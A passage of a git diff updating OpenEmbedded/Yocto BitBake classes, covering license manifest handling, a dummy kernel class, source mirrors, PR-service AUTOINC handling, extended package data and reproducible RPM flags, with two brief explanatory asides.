bb.build.exec_func("oe_runmake", d)
bb.note("collecting binary locales from locale tree")
diff --git a/meta/classes/license.bbclass b/meta/classes/license.bbclass
index f90176d6c0..806b5069fd 100644
--- a/meta/classes/license.bbclass
+++ b/meta/classes/license.bbclass
@@ -31,7 +31,8 @@ python do_populate_lic() {
f.write("%s: %s\n" % (key, info[key]))
}
-# it would be better to copy them in do_install_append, but find_license_filesa is python
+PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '') + ' ' + d.getVar('COREBASE') + '/meta/COPYING').split())}"
+# it would be better to copy them in do_install:append, but find_license_filesa is python
python perform_packagecopy_prepend () {
enabled = oe.data.typed_value('LICENSE_CREATE_PACKAGE', d)
if d.getVar('CLASSOVERRIDE') == 'class-target' and enabled:
@@ -90,17 +91,17 @@ def copy_license_files(lic_files_paths, destdir):
os.link(src, dst)
except OSError as err:
if err.errno == errno.EXDEV:
- # Copy license files if hard-link is not possible even if st_dev is the
+ # Copy license files if hardlink is not possible even if st_dev is the
# same on source and destination (docker container with device-mapper?)
canlink = False
else:
raise
- # Only chown if we did hardling, and, we're running under pseudo
+ # Only chown if we did hardlink and we're running under pseudo
if canlink and os.environ.get('PSEUDO_DISABLED') == '0':
os.chown(dst,0,0)
if not canlink:
- begin_idx = int(beginline)-1 if beginline is not None else None
- end_idx = int(endline) if endline is not None else None
+ begin_idx = max(0, int(beginline) - 1) if beginline is not None else None
+ end_idx = max(0, int(endline)) if endline is not None else None
if begin_idx is None and end_idx is None:
shutil.copyfile(src, dst)
else:
@@ -152,6 +153,10 @@ def find_license_files(d):
find_license(node.s.replace("+", "").replace("*", ""))
self.generic_visit(node)
+ def visit_Constant(self, node):
+ find_license(node.value.replace("+", "").replace("*", ""))
+ self.generic_visit(node)
+
def find_license(license_type):
try:
bb.utils.mkdirhier(gen_lic_dest)
diff --git a/meta/classes/license_image.bbclass b/meta/classes/license_image.bbclass
index a8c72da3cb..325b3cbba7 100644
--- a/meta/classes/license_image.bbclass
+++ b/meta/classes/license_image.bbclass
@@ -1,3 +1,5 @@
+ROOTFS_LICENSE_DIR = "${IMAGE_ROOTFS}/usr/share/common-licenses"
+
python write_package_manifest() {
# Get list of installed packages
license_image_dir = d.expand('${LICENSE_DIRECTORY}/${IMAGE_NAME}')
@@ -7,8 +9,8 @@ python write_package_manifest() {
pkgs = image_list_installed_packages(d)
output = format_pkg_list(pkgs)
- open(os.path.join(license_image_dir, 'package.manifest'),
- 'w+').write(output)
+ with open(os.path.join(license_image_dir, 'package.manifest'), "w+") as package_manifest:
+ package_manifest.write(output)
}
python license_create_manifest() {
@@ -105,8 +107,7 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
copy_lic_manifest = d.getVar('COPY_LIC_MANIFEST')
copy_lic_dirs = d.getVar('COPY_LIC_DIRS')
if rootfs and copy_lic_manifest == "1":
- rootfs_license_dir = os.path.join(d.getVar('IMAGE_ROOTFS'),
- 'usr', 'share', 'common-licenses')
+ rootfs_license_dir = d.getVar('ROOTFS_LICENSE_DIR')
bb.utils.mkdirhier(rootfs_license_dir)
rootfs_license_manifest = os.path.join(rootfs_license_dir,
os.path.split(license_manifest)[1])
@@ -125,7 +126,6 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
licenses = os.listdir(pkg_license_dir)
for lic in licenses:
- rootfs_license = os.path.join(rootfs_license_dir, lic)
pkg_license = os.path.join(pkg_license_dir, lic)
pkg_rootfs_license = os.path.join(pkg_rootfs_license_dir, lic)
@@ -144,11 +144,14 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
bad_licenses) == False:
continue
+ # Make sure we use only canonical name for the license file
+ generic_lic_file = "generic_%s" % generic_lic
+ rootfs_license = os.path.join(rootfs_license_dir, generic_lic_file)
if not os.path.exists(rootfs_license):
oe.path.copyhardlink(pkg_license, rootfs_license)
if not os.path.exists(pkg_rootfs_license):
- os.symlink(os.path.join('..', lic), pkg_rootfs_license)
+ os.symlink(os.path.join('..', generic_lic_file), pkg_rootfs_license)
else:
if (oe.license.license_ok(canonical_license(d,
lic), bad_licenses) == False or
@@ -208,9 +211,10 @@ def get_deployed_dependencies(d):
deploy = {}
# Get all the dependencies for the current task (rootfs).
taskdata = d.getVar("BB_TASKDEPDATA", False)
+ pn = d.getVar("PN")
depends = list(set([dep[0] for dep
in list(taskdata.values())
- if not dep[0].endswith("-native")]))
+ if not dep[0].endswith("-native") and not dep[0] == pn]))
# To verify what was deployed it checks the rootfs dependencies against
# the SSTATE_MANIFESTS for "deploy" task.
@@ -254,3 +258,13 @@ python do_populate_lic_deploy() {
addtask populate_lic_deploy before do_build after do_image_complete
do_populate_lic_deploy[recrdeptask] += "do_populate_lic do_deploy"
+python license_qa_dead_symlink() {
+ import os
+
+ for root, dirs, files in os.walk(d.getVar('ROOTFS_LICENSE_DIR')):
+ for file in files:
+ full_path = root + "/" + file
+ if os.path.islink(full_path) and not os.path.exists(full_path):
+ bb.error("broken symlink: " + full_path)
+}
+IMAGE_QA_COMMANDS += "license_qa_dead_symlink"
diff --git a/meta/classes/linux-dummy.bbclass b/meta/classes/linux-dummy.bbclass
new file mode 100644
index 0000000000..cd8791557d
--- /dev/null
+++ b/meta/classes/linux-dummy.bbclass
@@ -0,0 +1,26 @@
+
+python __anonymous () {
+ if d.getVar('PREFERRED_PROVIDER_virtual/kernel') == 'linux-dummy':
+ # copy part codes from kernel.bbclass
+ kname = d.getVar('KERNEL_PACKAGE_NAME') or "kernel"
+
+ # set an empty package of kernel-devicetree
+ d.appendVar('PACKAGES', ' %s-devicetree' % kname)
+ d.setVar('ALLOW_EMPTY_%s-devicetree' % kname, '1')
+
+ # Merge KERNEL_IMAGETYPE and KERNEL_ALT_IMAGETYPE into KERNEL_IMAGETYPES
+ type = d.getVar('KERNEL_IMAGETYPE') or ""
+ alttype = d.getVar('KERNEL_ALT_IMAGETYPE') or ""
+ types = d.getVar('KERNEL_IMAGETYPES') or ""
+ if type not in types.split():
+ types = (type + ' ' + types).strip()
+ if alttype not in types.split():
+ types = (alttype + ' ' + types).strip()
+
+ # set empty packages of kernel-image-*
+ for type in types.split():
+ typelower = type.lower()
+ d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
+ d.setVar('ALLOW_EMPTY_%s-image-%s' % (kname, typelower), '1')
+}
+
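
The new class only takes effect when the dummy kernel provider is actually selected, which a machine or local configuration would do along these lines:

    PREFERRED_PROVIDER_virtual/kernel = "linux-dummy"
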
diff --git a/meta/classes/linuxloader.bbclass b/meta/classes/linuxloader.bbclass
index ec0e0556dd..796ab3afe4 100644
--- a/meta/classes/linuxloader.bbclass
+++ b/meta/classes/linuxloader.bbclass
@@ -1,6 +1,6 @@
def get_musl_loader_arch(d):
import re
- ldso_arch = None
+ ldso_arch = "NotSupported"
targetarch = d.getVar("TARGET_ARCH")
if targetarch.startswith("microblaze"):
@@ -30,7 +30,7 @@ def get_musl_loader(d):
def get_glibc_loader(d):
import re
- dynamic_loader = None
+ dynamic_loader = "NotSupported"
targetarch = d.getVar("TARGET_ARCH")
if targetarch in ["powerpc", "microblaze"]:
dynamic_loader = "${base_libdir}/ld.so.1"
@@ -56,7 +56,7 @@ def get_linuxloader(d):
overrides = d.getVar("OVERRIDES").split(":")
if "libc-baremetal" in overrides:
- return None
+ return "NotSupported"
if "libc-musl" in overrides:
dynamic_loader = get_musl_loader(d)
diff --git a/meta/classes/metadata_scm.bbclass b/meta/classes/metadata_scm.bbclass
index 58bb4c555a..47cb969b8d 100644
--- a/meta/classes/metadata_scm.bbclass
+++ b/meta/classes/metadata_scm.bbclass
@@ -1,6 +1,3 @@
-METADATA_BRANCH ?= "${@base_detect_branch(d)}"
-METADATA_REVISION ?= "${@base_detect_revision(d)}"
-
def base_detect_revision(d):
path = base_get_scmbasepath(d)
return base_get_metadata_git_revision(path, d)
@@ -40,3 +37,8 @@ def base_get_metadata_git_revision(path, d):
except bb.process.ExecutionError:
rev = '<unknown>'
return rev.strip()
+
+METADATA_BRANCH := "${@base_detect_branch(d)}"
+METADATA_BRANCH[vardepvalue] = "${METADATA_BRANCH}"
+METADATA_REVISION := "${@base_detect_revision(d)}"
+METADATA_REVISION[vardepvalue] = "${METADATA_REVISION}"
diff --git a/meta/classes/mirrors.bbclass b/meta/classes/mirrors.bbclass
index 87bba41472..669d0cc8ff 100644
--- a/meta/classes/mirrors.bbclass
+++ b/meta/classes/mirrors.bbclass
@@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \
ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \
ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \
ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \
-http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \
http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \
http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \
${APACHE_MIRROR} http://www.us.apache.org/dist \n \
@@ -43,6 +42,7 @@ ftp://sourceware.org/pub http://ftp.gwdg.de/pub/linux/sources.redhat.com/sourcew
cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
+gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
@@ -53,6 +53,7 @@ npm://.*/?.* http://downloads.yoctoproject.org/mirror/sources/ \n \
cvs://.*/.* http://sources.openembedded.org/ \n \
svn://.*/.* http://sources.openembedded.org/ \n \
git://.*/.* http://sources.openembedded.org/ \n \
+gitsm://.*/.* http://sources.openembedded.org/ \n \
hg://.*/.* http://sources.openembedded.org/ \n \
bzr://.*/.* http://sources.openembedded.org/ \n \
p4://.*/.* http://sources.openembedded.org/ \n \
@@ -62,6 +63,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \
npm://.*/?.* http://sources.openembedded.org/ \n \
${CPAN_MIRROR} http://cpan.metacpan.org/ \n \
${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \
+https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \
+https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \
"
# Use MIRRORS to provide git repo fallbacks using the https protocol, for cases
diff --git a/meta/classes/multilib.bbclass b/meta/classes/multilib.bbclass
index ee677da1e2..b5c59ac593 100644
--- a/meta/classes/multilib.bbclass
+++ b/meta/classes/multilib.bbclass
@@ -45,6 +45,7 @@ python multilib_virtclass_handler () {
e.data.setVar("RECIPE_SYSROOT", "${WORKDIR}/recipe-sysroot")
e.data.setVar("STAGING_DIR_TARGET", "${WORKDIR}/recipe-sysroot")
e.data.setVar("STAGING_DIR_HOST", "${WORKDIR}/recipe-sysroot")
+ e.data.setVar("RECIPE_SYSROOT_MANIFEST_SUBDIR", "nativesdk-" + variant)
e.data.setVar("MLPREFIX", variant + "-")
override = ":virtclass-multilib-" + variant
e.data.setVar("OVERRIDES", e.data.getVar("OVERRIDES", False) + override)
@@ -106,7 +107,6 @@ python __anonymous () {
d.setVar("LINGUAS_INSTALL", "")
# FIXME, we need to map this to something, not delete it!
d.setVar("PACKAGE_INSTALL_ATTEMPTONLY", "")
- bb.build.deltask('do_populate_sdk', d)
bb.build.deltask('do_populate_sdk_ext', d)
return
diff --git a/meta/classes/nativesdk.bbclass b/meta/classes/nativesdk.bbclass
index 7f2692c51a..dc5a9756b6 100644
--- a/meta/classes/nativesdk.bbclass
+++ b/meta/classes/nativesdk.bbclass
@@ -113,3 +113,5 @@ do_packagedata[stamp-extra-info] = ""
USE_NLS = "${SDKUSE_NLS}"
OLDEST_KERNEL = "${SDK_OLDEST_KERNEL}"
+
+PATH_prepend = "${COREBASE}/scripts/nativesdk-intercept:"
diff --git a/meta/classes/npm.bbclass b/meta/classes/npm.bbclass
index 068032a1e5..bd01e247cd 100644
--- a/meta/classes/npm.bbclass
+++ b/meta/classes/npm.bbclass
@@ -17,8 +17,10 @@
# NPM_INSTALL_DEV:
# Set to 1 to also install devDependencies.
+inherit python3native
+
DEPENDS_prepend = "nodejs-native "
-RDEPENDS_${PN}_prepend = "nodejs "
+RDEPENDS_${PN}_append_class-target = " nodejs"
NPM_INSTALL_DEV ?= "0"
@@ -237,9 +239,7 @@ python npm_do_compile() {
sysroot = d.getVar("RECIPE_SYSROOT_NATIVE")
nodedir = os.path.join(sysroot, d.getVar("prefix_native").strip("/"))
configs.append(("nodedir", nodedir))
- bindir = os.path.join(sysroot, d.getVar("bindir_native").strip("/"))
- pythondir = os.path.join(bindir, "python-native", "python")
- configs.append(("python", pythondir))
+ configs.append(("python", d.getVar("PYTHON")))
# Add node-pre-gyp configuration
args.append(("target_arch", d.getVar("NPM_ARCH")))
diff --git a/meta/classes/package.bbclass b/meta/classes/package.bbclass
index cc64ddffc3..49d30caef7 100644
--- a/meta/classes/package.bbclass
+++ b/meta/classes/package.bbclass
@@ -7,7 +7,7 @@
#
# There are the following default steps but PACKAGEFUNCS can be extended:
#
-# a) package_get_auto_pr - get PRAUTO from remote PR service
+# a) package_convert_pr_autoinc - convert AUTOINC in PKGV to ${PRSERV_PV_AUTOINC}
#
# b) perform_packagecopy - Copy D into PKGD
#
@@ -585,12 +585,20 @@ def runtime_mapping_rename (varname, pkg, d):
#bb.note("%s after: %s" % (varname, d.getVar(varname)))
#
-# Package functions suitable for inclusion in PACKAGEFUNCS
+# Used by do_packagedata (and possibly other routines post do_package)
#
+package_get_auto_pr[vardepsexclude] = "BB_TASKDEPDATA"
python package_get_auto_pr() {
import oe.prservice
- import re
+
+ def get_do_package_hash(pn):
+ if d.getVar("BB_RUNTASK") != "do_package":
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ for dep in taskdepdata:
+ if taskdepdata[dep][1] == "do_package" and taskdepdata[dep][0] == pn:
+ return taskdepdata[dep][6]
+ return None
# Support per recipe PRSERV_HOST
pn = d.getVar('PN')
@@ -602,15 +610,22 @@ python package_get_auto_pr() {
# PR Server not active, handle AUTOINC
if not d.getVar('PRSERV_HOST'):
- if 'AUTOINC' in pkgv:
- d.setVar("PKGV", pkgv.replace("AUTOINC", "0"))
+ d.setVar("PRSERV_PV_AUTOINC", "0")
return
auto_pr = None
pv = d.getVar("PV")
version = d.getVar("PRAUTOINX")
pkgarch = d.getVar("PACKAGE_ARCH")
- checksum = d.getVar("BB_TASKHASH")
+ checksum = get_do_package_hash(pn)
+
+ # If do_package isn't in the dependencies, we can't get the checksum...
+ if not checksum:
+ bb.warn('Task %s requested do_package unihash, but it was not available.' % d.getVar('BB_RUNTASK'))
+ #taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ #for dep in taskdepdata:
+ # bb.warn('%s:%s = %s' % (taskdepdata[dep][0], taskdepdata[dep][1], taskdepdata[dep][6]))
+ return
if d.getVar('PRSERV_LOCKDOWN'):
auto_pr = d.getVar('PRAUTO_' + version + '_' + pkgarch) or d.getVar('PRAUTO_' + version) or None
@@ -628,7 +643,7 @@ python package_get_auto_pr() {
srcpv = bb.fetch2.get_srcrev(d)
base_ver = "AUTOINC-%s" % version[:version.find(srcpv)]
value = conn.getPR(base_ver, pkgarch, srcpv)
- d.setVar("PKGV", pkgv.replace("AUTOINC", str(value)))
+ d.setVar("PRSERV_PV_AUTOINC", str(value))
auto_pr = conn.getPR(version, pkgarch, checksum)
except Exception as e:
@@ -638,6 +653,22 @@ python package_get_auto_pr() {
d.setVar('PRAUTO',str(auto_pr))
}
+#
+# Package functions suitable for inclusion in PACKAGEFUNCS
+#
+
+python package_convert_pr_autoinc() {
+ pkgv = d.getVar("PKGV")
+
+ # Adjust pkgv as necessary...
+ if 'AUTOINC' in pkgv:
+ d.setVar("PKGV", pkgv.replace("AUTOINC", "${PRSERV_PV_AUTOINC}"))
+
+ # Change PRSERV_PV_AUTOINC and EXTENDPRAUTO usage to special values
+ d.setVar('PRSERV_PV_AUTOINC', '@PRSERV_PV_AUTOINC@')
+ d.setVar('EXTENDPRAUTO', '@EXTENDPRAUTO@')
+}
+
LOCALEBASEPN ??= "${PN}"
python package_do_split_locales() {
@@ -1109,6 +1140,14 @@ python split_and_strip_files () {
# Modified the file so clear the cache
cpath.updatecache(file)
+ def strip_pkgd_prefix(f):
+ nonlocal dvar
+
+ if f.startswith(dvar):
+ return f[len(dvar):]
+
+ return f
+
#
# First lets process debug splitting
#
@@ -1122,6 +1161,8 @@ python split_and_strip_files () {
for file in staticlibs:
results.append( (file,source_info(file, d)) )
+ d.setVar("PKGDEBUGSOURCES", {strip_pkgd_prefix(f): sorted(s) for f, s in results})
+
sources = set()
for r in results:
sources.update(r[1])
@@ -1429,6 +1470,7 @@ PKGDATA_VARS = "PN PE PV PR PKGE PKGV PKGR LICENSE DESCRIPTION SUMMARY RDEPENDS
python emit_pkgdata() {
from glob import glob
import json
+ import gzip
def process_postinst_on_target(pkg, mlprefix):
pkgval = d.getVar('PKG_%s' % pkg)
@@ -1501,6 +1543,8 @@ fi
with open(data_file, 'w') as fd:
fd.write("PACKAGES: %s\n" % packages)
+ pkgdebugsource = d.getVar("PKGDEBUGSOURCES") or []
+
pn = d.getVar('PN')
global_variants = (d.getVar('MULTILIB_GLOBAL_VARIANTS') or "").split()
variants = (d.getVar('MULTILIB_VARIANTS') or "").split()
@@ -1520,17 +1564,32 @@ fi
pkgval = pkg
d.setVar('PKG_%s' % pkg, pkg)
+ extended_data = {
+ "files_info": {}
+ }
+
pkgdestpkg = os.path.join(pkgdest, pkg)
files = {}
+ files_extra = {}
total_size = 0
seen = set()
for f in pkgfiles[pkg]:
- relpth = os.path.relpath(f, pkgdestpkg)
+ fpath = os.sep + os.path.relpath(f, pkgdestpkg)
+
fstat = os.lstat(f)
- files[os.sep + relpth] = fstat.st_size
+ files[fpath] = fstat.st_size
+
+ extended_data["files_info"].setdefault(fpath, {})
+ extended_data["files_info"][fpath]['size'] = fstat.st_size
+
if fstat.st_ino not in seen:
seen.add(fstat.st_ino)
total_size += fstat.st_size
+
+ if fpath in pkgdebugsource:
+ extended_data["files_info"][fpath]['debugsrc'] = pkgdebugsource[fpath]
+ del pkgdebugsource[fpath]
+
d.setVar('FILES_INFO', json.dumps(files, sort_keys=True))
process_postinst_on_target(pkg, d.getVar("MLPREFIX"))
@@ -1551,6 +1610,10 @@ fi
sf.write('%s_%s: %d\n' % ('PKGSIZE', pkg, total_size))
+ subdata_extended_file = pkgdatadir + "/extended/%s.json.gz" % pkg
+ with gzip.open(subdata_extended_file, "wt", encoding="utf-8") as f:
+ json.dump(extended_data, f, sort_keys=True, separators=(",", ":"))
+
# Symlinks needed for rprovides lookup
rprov = d.getVar('RPROVIDES_%s' % pkg) or d.getVar('RPROVIDES')
if rprov:
@@ -1581,7 +1644,8 @@ fi
write_extra_runtime_pkgs(global_variants, packages, pkgdatadir)
}
-emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides"
+emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides ${PKGDESTWORK}/extended"
+emit_pkgdata[vardepsexclude] = "BB_NUMBER_THREADS"
ldconfig_postinst_fragment() {
if [ x"$D" = "x" ]; then
@@ -1589,7 +1653,7 @@ if [ x"$D" = "x" ]; then
fi
}
-RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps"
+RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps --define '__font_provides %{nil}'"
# Collect perfile run-time dependency metadata
# Output:
@@ -1958,12 +2022,12 @@ python package_do_pkgconfig () {
for pkg in packages.split():
pkgconfig_provided[pkg] = []
pkgconfig_needed[pkg] = []
- for file in pkgfiles[pkg]:
+ for file in sorted(pkgfiles[pkg]):
m = pc_re.match(file)
if m:
pd = bb.data.init()
name = m.group(1)
- pkgconfig_provided[pkg].append(name)
+ pkgconfig_provided[pkg].append(os.path.basename(name))
if not os.access(file, os.R_OK):
continue
with open(file, 'r') as f:
@@ -1986,7 +2050,7 @@ python package_do_pkgconfig () {
pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist")
if pkgconfig_provided[pkg] != []:
with open(pkgs_file, 'w') as f:
- for p in pkgconfig_provided[pkg]:
+ for p in sorted(pkgconfig_provided[pkg]):
f.write('%s\n' % p)
# Go from least to most specific since the last one found wins
@@ -2225,7 +2289,7 @@ python do_package () {
# cache. This is useful if an item this class depends on changes in a
# way that the output of this class changes. rpmdeps is a good example
# as any change to rpmdeps requires this to be rerun.
- # PACKAGE_BBCLASS_VERSION = "2"
+ # PACKAGE_BBCLASS_VERSION = "4"
# Init cachedpath
global cpath
@@ -2251,7 +2315,7 @@ python do_package () {
package_qa_handle_error("var-undefined", msg, d)
return
- bb.build.exec_func("package_get_auto_pr", d)
+ bb.build.exec_func("package_convert_pr_autoinc", d)
###########################################################################
# Optimisations
@@ -2323,9 +2387,21 @@ addtask do_package_setscene
# Copy from PKGDESTWORK to tempdirectory as tempdirectory can be cleaned at both
# do_package_setscene and do_packagedata_setscene leading to races
python do_packagedata () {
+ bb.build.exec_func("package_get_auto_pr", d)
+
src = d.expand("${PKGDESTWORK}")
dest = d.expand("${WORKDIR}/pkgdata-pdata-input")
oe.path.copyhardlinktree(src, dest)
+
+ bb.build.exec_func("packagedata_translate_pr_autoinc", d)
+}
+do_packagedata[cleandirs] += "${WORKDIR}/pkgdata-pdata-input"
+
+# Translate the EXTENDPRAUTO and AUTOINC to the final values
+packagedata_translate_pr_autoinc() {
+ find ${WORKDIR}/pkgdata-pdata-input -type f | xargs --no-run-if-empty \
+ sed -e 's,@PRSERV_PV_AUTOINC@,${PRSERV_PV_AUTOINC},g' \
+ -e 's,@EXTENDPRAUTO@,${EXTENDPRAUTO},g' -i
}
addtask packagedata before do_build after do_package
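
With the split above, AUTOINC in PKGV is replaced through the PRSERV_PV_AUTOINC placeholder at do_packagedata time; without a PR service it simply becomes 0, so e.g. 1.0+gitAUTOINC+<rev> resolves to 1.0+git0+<rev>. To get incrementing values a PR service still has to be configured, typically (illustrative):

    PRSERV_HOST = "localhost:0"
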
diff --git a/meta/classes/package_deb.bbclass b/meta/classes/package_deb.bbclass
index 790b26aef2..fa8c6c82ff 100644
--- a/meta/classes/package_deb.bbclass
+++ b/meta/classes/package_deb.bbclass
@@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}"
do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}"
do_package_write_deb[umask] = "022"
do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_deb after do_packagedata do_package
-
+EPOCHTASK ??= ""
+addtask package_write_deb after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot"
diff --git a/meta/classes/package_ipk.bbclass b/meta/classes/package_ipk.bbclass
index c008559e4a..4927cfba00 100644
--- a/meta/classes/package_ipk.bbclass
+++ b/meta/classes/package_ipk.bbclass
@@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}"
do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}"
do_package_write_ipk[umask] = "022"
do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_ipk after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot"
diff --git a/meta/classes/package_pkgdata.bbclass b/meta/classes/package_pkgdata.bbclass
index 18b7ed62e0..a1ea8fc041 100644
--- a/meta/classes/package_pkgdata.bbclass
+++ b/meta/classes/package_pkgdata.bbclass
@@ -162,6 +162,6 @@ python package_prepare_pkgdata() {
}
package_prepare_pkgdata[cleandirs] = "${WORKDIR_PKGDATA}"
-package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA"
+package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA SSTATETASKS"
diff --git a/meta/classes/package_rpm.bbclass b/meta/classes/package_rpm.bbclass
index 9145717f98..65587d228b 100644
--- a/meta/classes/package_rpm.bbclass
+++ b/meta/classes/package_rpm.bbclass
@@ -678,10 +678,12 @@ python do_package_rpm () {
cmd = cmd + " --define '_use_internal_dependency_generator 0'"
cmd = cmd + " --define '_binaries_in_noarch_packages_terminate_build 0'"
cmd = cmd + " --define '_build_id_links none'"
- cmd = cmd + " --define '_binary_payload w6T.xzdio'"
- cmd = cmd + " --define '_source_payload w6T.xzdio'"
+ cmd = cmd + " --define '_binary_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
+ cmd = cmd + " --define '_source_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
cmd = cmd + " --define 'clamp_mtime_to_source_date_epoch 1'"
+ cmd = cmd + " --define 'use_source_date_epoch_as_buildtime 1'"
cmd = cmd + " --define '_buildhost reproducible'"
+ cmd = cmd + " --define '__font_provides %{nil}'"
if perfiledeps:
cmd = cmd + " --define '__find_requires " + outdepends + "'"
cmd = cmd + " --define '__find_provides " + outprovides + "'"
@@ -741,7 +743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}"
do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}"
do_package_write_rpm[umask] = "022"
do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_rpm after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot"
diff --git a/meta/classes/patch.bbclass b/meta/classes/patch.bbclass
index 25ec089ae1..484d27ac76 100644
--- a/meta/classes/patch.bbclass
+++ b/meta/classes/patch.bbclass
@@ -131,6 +131,9 @@ python patch_do_patch() {
patchdir = parm["patchdir"]
if not os.path.isabs(patchdir):
patchdir = os.path.join(s, patchdir)
+ if not os.path.isdir(patchdir):
+ bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" %
+ (patchdir, parm["patchdir"], parm['patchname']))
else:
patchdir = s
@@ -147,12 +150,12 @@ python patch_do_patch() {
patchset.Import({"file":local, "strippath": parm['striplevel']}, True)
except Exception as exc:
bb.utils.remove(process_tmpdir, True)
- bb.fatal(str(exc))
+ bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc)))
try:
resolver.Resolve()
except bb.BBHandledException as e:
bb.utils.remove(process_tmpdir, True)
- bb.fatal(str(e))
+ bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e)))
bb.utils.remove(process_tmpdir, True)
del os.environ['TMPDIR']
diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass
index 3e5b1359d6..49fdfaa93d 100644
--- a/meta/classes/populate_sdk_base.bbclass
+++ b/meta/classes/populate_sdk_base.bbclass
@@ -51,6 +51,8 @@ TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
SDK_ARCHIVE_TYPE ?= "tar.xz"
SDK_XZ_COMPRESSION_LEVEL ?= "-9"
SDK_XZ_OPTIONS ?= "${XZ_DEFAULTS} ${SDK_XZ_COMPRESSION_LEVEL}"
+SDK_ZIP_OPTIONS ?= "-y"
+
# To support different sdk type according to SDK_ARCHIVE_TYPE, now support zip and tar.xz
python () {
@@ -58,7 +60,7 @@ python () {
d.setVar('SDK_ARCHIVE_DEPENDS', 'zip-native')
# SDK_ARCHIVE_CMD used to generate archived sdk ${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} from input dir ${SDK_OUTPUT}/${SDKPATH} to output dir ${SDKDEPLOYDIR}
# it is recommended to cd into the input dir first to avoid archiving the build path
- d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r -y ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
